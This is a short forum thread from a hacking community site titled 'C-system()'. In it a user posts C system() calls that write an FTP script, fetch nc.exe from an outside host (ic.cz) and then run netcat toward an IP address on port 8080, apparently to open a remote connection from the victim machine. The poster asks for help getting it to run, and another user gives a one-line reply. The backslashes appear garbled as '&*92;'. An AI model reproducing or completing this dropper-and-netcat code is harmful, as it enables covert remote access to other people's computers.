Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

C-system()


ghost's Avatar
0 0

I have small problem… I need this to run:

system("@echo epp > c:&*92;ftptmp");
system("@echo live >> C:&*92;ftptmp");
system("@echo bin >> C:&*92;ftptmp");
system("@echo cd ftproot >> C:&*92;ftptmp");
system("@echo get nc.exe C:&*92;nc.exe >> C:&*92;ftptmp");
system("@echo bye >> C:&*92;ftptmp");
system("@if exists C:&*92;ftptmp ftp -s:C:&*92;ftptmp ic.cz");
system("@if exists C:&*92;nc.exe (C:&*92;nc -d 62.177.92.240 8080) else (");
system("ftp -s:C:&*92;ftptmp ic.cz");

(name and password are incorrect..)


Mr_Cheese's Avatar
0 1

why dont you just compile it?


ghost's Avatar
0 0

it doesn't run. BTW I compiled it:)